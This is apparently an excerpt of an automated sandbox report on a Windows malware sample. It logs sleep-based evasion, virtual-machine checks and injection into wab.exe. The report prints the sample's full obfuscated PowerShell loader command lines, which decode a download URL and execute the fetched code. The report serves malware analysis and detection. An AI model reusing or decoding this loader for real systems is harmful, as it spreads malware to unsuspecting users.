Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 594989 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 594860 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 594735 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 594610 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 594485 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 594360 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 594235 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 594110 Jump to behavior
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5109 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4807 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6146 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3666 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: threadDelayed 3201 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: threadDelayed 6615 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\wscript.exe TID: 6496 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7248 Thread sleep time: -2767011611056431s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7380 Thread sleep count: 6146 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7380 Thread sleep count: 3666 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7412 Thread sleep time: -5534023222112862s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100 Thread sleep time: -26747778906878833s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8112 Thread sleep count: 3201 > 30 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100 Thread sleep time: -599891s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8112 Thread sleep count: 6615 > 30 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100 Thread sleep time: -599782s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100 Thread sleep time: -599658s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100 Thread sleep time: -599532s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100 Thread sleep time: -599407s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100 Thread sleep time: -599282s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100 Thread sleep time: -599172s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100 Thread sleep time: -599063s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100 Thread sleep time: -598938s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100 Thread sleep time: -598813s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100 Thread sleep time: -598688s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100 Thread sleep time: -598563s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100 Thread sleep time: -598452s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100 Thread sleep time: -598344s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100 Thread sleep time: -598219s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100 Thread sleep time: -598081s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100 Thread sleep time: -597953s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100 Thread sleep time: -597844s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100 Thread sleep time: -597723s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100 Thread sleep time: -597594s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100 Thread sleep time: -597469s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100 Thread sleep time: -597359s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100 Thread sleep time: -597250s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100 Thread sleep time: -597141s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100 Thread sleep time: -597031s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100 Thread sleep time: -596922s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100 Thread sleep time: -596811s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100 Thread sleep time: -596688s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100 Thread sleep time: -596578s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100 Thread sleep time: -596469s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100 Thread sleep time: -596344s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100 Thread sleep time: -596235s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100 Thread sleep time: -596110s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100 Thread sleep time: -595985s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100 Thread sleep time: -595860s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100 Thread sleep time: -595735s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100 Thread sleep time: -595610s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100 Thread sleep time: -595485s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100 Thread sleep time: -595360s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100 Thread sleep time: -595235s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100 Thread sleep time: -595110s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100 Thread sleep time: -594989s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100 Thread sleep time: -594860s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100 Thread sleep time: -594735s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100 Thread sleep time: -594610s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100 Thread sleep time: -594485s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100 Thread sleep time: -594360s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100 Thread sleep time: -594235s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100 Thread sleep time: -594110s >= -30000s Jump to behavior
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\cmd.exe File Volume queried: C:\Windows\System32 FullSizeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 599891 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 599782 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 599658 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 599532 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 599407 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 599282 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 599172 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 599063 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 598938 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 598813 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 598688 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 598563 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 598452 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 598344 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 598219 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 598081 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597953 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597844 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597723 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597594 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597469 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597359 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597250 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597141 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597031 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596922 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596811 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596688 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596578 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596469 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596344 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596235 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596110 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 595985 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 595860 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 595735 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 595610 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 595485 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 595360 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 595235 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 595110 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 594989 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 594860 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 594735 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 594610 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 594485 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 594360 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 594235 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 594110 Jump to behavior
Source: powershell.exe, 00000007.00000002.2633083734.000001B6D9D30000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWsf%SystemRoot%\system32\mswsock.dllEgot.FraseCS midoColomnSybilvOmraaeGonorrHochet Int ]Spytk:Humor:Evoc.F egimr.astroBesvrmKasseBenkelaSkaktsNordieLgg,r6Tu,en4BortfSOpalitMesmer langi DilanThromgFolke( Thym$Om,ryENoneqg Te.eoSyn,etUngerrBrakeiMastopAsbespBttef{
Source: wscript.exe, 00000000.00000002.1693047958.000001CF458BD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: wscript.exe, 00000000.00000003.1690205040.000001CF477C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1693745315.000001CF477C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1671838284.000001CF477C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1693108538.000001CF458C9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1671772299.000001CF458AA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1690508497.000001CF458C7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1671339268.000001CF477C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1671988341.000001CF477C2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3C80000 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 58FB44 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\PING.EXE ping google.com -n 1 Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\PING.EXE ping %.%.%.% Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c dir Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Prohostility = 1;$Panthaver='Substrin';$Panthaver+='g';Function Posthoc168($Forretningssteds){$Reservedel=$Forretningssteds.Length-$Prohostility;For($Kombinat=5; $Kombinat -lt $Reservedel; $Kombinat+=(6)){$Samvrsproblemer48+=$Forretningssteds.$Panthaver.Invoke($Kombinat, $Prohostility);}$Samvrsproblemer48;}function Halvkusinen($Teraglin){& ($Positivernes) ($Teraglin);}$Dykkerurenes=Posthoc168 'flertMPhy.ooFestrzRigniiAbsurl Solul ud,taLamin/brnes5te.ta. Glu.0 ,aag Enkem(SekspWPa,eoiOpr.snMaidhd Aluno tudewSengesmidda DeterNSubskTSemir smara1 Tabt0Dekla. top 0Demon;alcme TransWRepreiBl.amn Tona6 Jauk4Bret,;Stutt Ch,mpx Ha.i6Def e4Mllen;Skinn Strawr,onvevDolio:Oecod1 nvol2Contr1Mega,.Cycla0Bille).ucce Dep sGJa eyeSl vecUnmeekStamboEksku/Fo,ke2Palae0Halvb1Inte.0Flyba0Strut1C.mpo0P,oto1 chir TugtFKorruiKas.er.peciePrincfbenzdo BortxBlr,g/tungt1Gr.se2Nonpe1Aftrd.Sling0Ordsg ';$Crabbiness=Posthoc168 'SkovdU MultsGavfleCausarSacch- onreA KrydgSammee,diotnIntemtPilh. ';$Forundendes79=Posthoc168 'BeaujhFaglit CamotUomstp Ha v:Nondi/ Spej/Mis.rm.adinnAus.oaUnconjC,untj plejaFor,rrLinj..Imperdava,leUhyrl/JeppevDyknis,quidpPrede1Ziara/RegelD ParauUnpropHyp rlBa,isoPreex.Zt,bomGamensEnolaoTvrfl ';$tacketed=Posthoc168 ' Trad>Mucid ';$Positivernes=Posthoc168 'F rhaiVegtseCupruxDilat ';$Gangstol = Posthoc168 'Djvl,esuppucRaglahRe leoLardo .awky%,ilggaSporhpRasmupmaskiddrejbaReat tC,preaEmmer%A biv\TaxafL Ambiu UblomGlob.iTrappnanprieStrifs yklcStligeHa,stndogmac O rienevadsDispl. Si,isPostnkGalejaDorat D,ar& Swab&Vedte BaidaeOpstic .iblh ,tomoGeise vola$Oz ge ';Halvkusinen (Posthoc168 'Pixel$DrejegTromplSkydeoLactib Jorda ingulSkg.a:KrympFA,ryle Un nm UnsloNick g itratNonteyUruguv Ledee KbstnVisi.d.enfoe Semi=Sorge(.ecatc glu.mNajedd Mble Hyper/AagercNordi Fals$DemonG yndaResonnJ ltjgBittesTrendtPrivaoHorn.ltrach)Tel,f ');Halvkusinen (Posthoc168 'Insul$Coinfg Un clRegr oFeriebVerboaDreadlAnmie:MoralT .aggrSareeeGuinedAfkome Erh lPi,antStemmerheu.sTaxic2Ind g0.umuh=Rabb.$SkrmsFPyrono EchorLotosu Trapn eetdAbbedeLingun.alkad SpineCo,gasRadio7S.eri9Podi .I.fins,libnp Uns,l Teali Pic,tJobna( Vagi$SnaggtArtsbaLig.ecTaxiekSlutneOccidtGalace,ndbodJeonm)Subin ');$Forundendes79=$Tredeltes20[0];Halvkusinen (Posthoc168 'Melit$Welleg.ormal.ninsoTota b WitmaInt.rlComor:Ba,ndPBr ureUndeclSjlsrs Dr,uvInr,drlimitk Skva= PostN SueveKv.rtw Stil-F ldnOReasobKvaddj Ty.eeBiovac armhtHo or JvnesSWieneyFen rsAn,vatPraese.emgtmLat.e.PerlaN egraeBiltrt Aspc.,ombyW DleseVkstrbBardiCLami lTrianiAccede AthenSplentGelee ');Halvkusinen (Posthoc168 ' anh$ refoP F.lgeHal,ll ServsD,ffev Nonar R gnkBevan.LaaseHS ydeeKlas.a antid B ineHnekyrSa dbs,rimi[Si,ke$Scru CTaoisrAr.piaStnknbIrna,b ldeliS,ivfn rypteFid.bsLg.etsSuffr],isob=Forsv$SelvoDPlaybyHo.sekProtekstreneArchirSecreuSa,itrSprage Guttn S.ineUnespsH emn ');$Prostatectomy=Posthoc168 'CacoxPLatche JordlSilvasS Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Luminescences.ska && echo $" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Prohostility = 1;$Panthaver='Substrin';$Panthaver+='g';Function Posthoc168($Forretningssteds){$Reservedel=$Forretningssteds.Length-$Prohostility;For($Kombinat=5; $Kombinat -lt $Reservedel; $Kombinat+=(6)){$Samvrsproblemer48+=$Forretningssteds.$Panthaver.Invoke($Kombinat, $Prohostility);}$Samvrsproblemer48;}function Halvkusinen($Teraglin){& ($Positivernes) ($Teraglin);}$Dykkerurenes=Posthoc168 'flertMPhy.ooFestrzRigniiAbsurl Solul ud,taLamin/brnes5te.ta. Glu.0 ,aag Enkem(SekspWPa,eoiOpr.snMaidhd Aluno tudewSengesmidda DeterNSubskTSemir smara1 Tabt0Dekla. top 0Demon;alcme TransWRepreiBl.amn Tona6 Jauk4Bret,;Stutt Ch,mpx Ha.i6Def e4Mllen;Skinn Strawr,onvevDolio:Oecod1 nvol2Contr1Mega,.Cycla0Bille).ucce Dep sGJa eyeSl vecUnmeekStamboEksku/Fo,ke2Palae0Halvb1Inte.0Flyba0Strut1C.mpo0P,oto1 chir TugtFKorruiKas.er.peciePrincfbenzdo BortxBlr,g/tungt1Gr.se2Nonpe1Aftrd.Sling0Ordsg ';$Crabbiness=Posthoc168 'SkovdU MultsGavfleCausarSacch- onreA KrydgSammee,diotnIntemtPilh. ';$Forundendes79=Posthoc168 'BeaujhFaglit CamotUomstp Ha v:Nondi/ Spej/Mis.rm.adinnAus.oaUnconjC,untj plejaFor,rrLinj..Imperdava,leUhyrl/JeppevDyknis,quidpPrede1Ziara/RegelD ParauUnpropHyp rlBa,isoPreex.Zt,bomGamensEnolaoTvrfl ';$tacketed=Posthoc168 ' Trad>Mucid ';$Positivernes=Posthoc168 'F rhaiVegtseCupruxDilat ';$Gangstol = Posthoc168 'Djvl,esuppucRaglahRe leoLardo .awky%,ilggaSporhpRasmupmaskiddrejbaReat tC,preaEmmer%A biv\TaxafL Ambiu UblomGlob.iTrappnanprieStrifs yklcStligeHa,stndogmac O rienevadsDispl. Si,isPostnkGalejaDorat D,ar& Swab&Vedte BaidaeOpstic .iblh ,tomoGeise vola$Oz ge ';Halvkusinen (Posthoc168 'Pixel$DrejegTromplSkydeoLactib Jorda ingulSkg.a:KrympFA,ryle Un nm UnsloNick g itratNonteyUruguv Ledee KbstnVisi.d.enfoe Semi=Sorge(.ecatc glu.mNajedd Mble Hyper/AagercNordi Fals$DemonG yndaResonnJ ltjgBittesTrendtPrivaoHorn.ltrach)Tel,f ');Halvkusinen (Posthoc168 'Insul$Coinfg Un clRegr oFeriebVerboaDreadlAnmie:MoralT .aggrSareeeGuinedAfkome Erh lPi,antStemmerheu.sTaxic2Ind g0.umuh=Rabb.$SkrmsFPyrono EchorLotosu Trapn eetdAbbedeLingun.alkad SpineCo,gasRadio7S.eri9Podi .I.fins,libnp Uns,l Teali Pic,tJobna( Vagi$SnaggtArtsbaLig.ecTaxiekSlutneOccidtGalace,ndbodJeonm)Subin ');$Forundendes79=$Tredeltes20[0];Halvkusinen (Posthoc168 'Melit$Welleg.ormal.ninsoTota b WitmaInt.rlComor:Ba,ndPBr ureUndeclSjlsrs Dr,uvInr,drlimitk Skva= PostN SueveKv.rtw Stil-F ldnOReasobKvaddj Ty.eeBiovac armhtHo or JvnesSWieneyFen rsAn,vatPraese.emgtmLat.e.PerlaN egraeBiltrt Aspc.,ombyW DleseVkstrbBardiCLami lTrianiAccede AthenSplentGelee ');Halvkusinen (Posthoc168 ' anh$ refoP F.lgeHal,ll ServsD,ffev Nonar R gnkBevan.LaaseHS ydeeKlas.a antid B ineHnekyrSa dbs,rimi[Si,ke$Scru CTaoisrAr.piaStnknbIrna,b ldeliS,ivfn rypteFid.bsLg.etsSuffr],isob=Forsv$SelvoDPlaybyHo.sekProtekstreneArchirSecreuSa,itrSprage Guttn S.ineUnespsH emn ');$Prostatectomy=Posthoc168 'CacoxPLatche JordlSilvasS Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Luminescences.ska && echo $" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$prohostility = 1;$panthaver='substrin';$panthaver+='g';function posthoc168($forretningssteds){$reservedel=$forretningssteds.length-$prohostility;for($kombinat=5; $kombinat -lt $reservedel; $kombinat+=(6)){$samvrsproblemer48+=$forretningssteds.$panthaver.invoke($kombinat, $prohostility);}$samvrsproblemer48;}function halvkusinen($teraglin){& ($positivernes) ($teraglin);}$dykkerurenes=posthoc168 'flertmphy.oofestrzrigniiabsurl solul ud,talamin/brnes5te.ta. glu.0 ,aag enkem(sekspwpa,eoiopr.snmaidhd aluno tudewsengesmidda deternsubsktsemir smara1 tabt0dekla. top 0demon;alcme transwrepreibl.amn tona6 jauk4bret,;stutt ch,mpx ha.i6def e4mllen;skinn strawr,onvevdolio:oecod1 nvol2contr1mega,.cycla0bille).ucce dep sgja eyesl vecunmeekstamboeksku/fo,ke2palae0halvb1inte.0flyba0strut1c.mpo0p,oto1 chir tugtfkorruikas.er.pecieprincfbenzdo bortxblr,g/tungt1gr.se2nonpe1aftrd.sling0ordsg ';$crabbiness=posthoc168 'skovdu multsgavflecausarsacch- onrea krydgsammee,diotnintemtpilh. ';$forundendes79=posthoc168 'beaujhfaglit camotuomstp ha v:nondi/ spej/mis.rm.adinnaus.oaunconjc,untj plejafor,rrlinj..imperdava,leuhyrl/jeppevdyknis,quidpprede1ziara/regeld parauunprophyp rlba,isopreex.zt,bomgamensenolaotvrfl ';$tacketed=posthoc168 ' trad>mucid ';$positivernes=posthoc168 'f rhaivegtsecupruxdilat ';$gangstol = posthoc168 'djvl,esuppucraglahre leolardo .awky%,ilggasporhprasmupmaskiddrejbareat tc,preaemmer%a biv\taxafl ambiu ublomglob.itrappnanpriestrifs yklcstligeha,stndogmac o rienevadsdispl. si,ispostnkgalejadorat d,ar& swab&vedte baidaeopstic .iblh ,tomogeise vola$oz ge ';halvkusinen (posthoc168 'pixel$drejegtromplskydeolactib jorda ingulskg.a:krympfa,ryle un nm unslonick g itratnonteyuruguv ledee kbstnvisi.d.enfoe semi=sorge(.ecatc glu.mnajedd mble hyper/aagercnordi fals$demong yndaresonnj ltjgbittestrendtprivaohorn.ltrach)tel,f ');halvkusinen (posthoc168 'insul$coinfg un clregr oferiebverboadreadlanmie:moralt .aggrsareeeguinedafkome erh lpi,antstemmerheu.staxic2ind g0.umuh=rabb.$skrmsfpyrono echorlotosu trapn eetdabbedelingun.alkad spineco,gasradio7s.eri9podi .i.fins,libnp uns,l teali pic,tjobna( vagi$snaggtartsbalig.ectaxiekslutneoccidtgalace,ndbodjeonm)subin ');$forundendes79=$tredeltes20[0];halvkusinen (posthoc168 'melit$welleg.ormal.ninsotota b 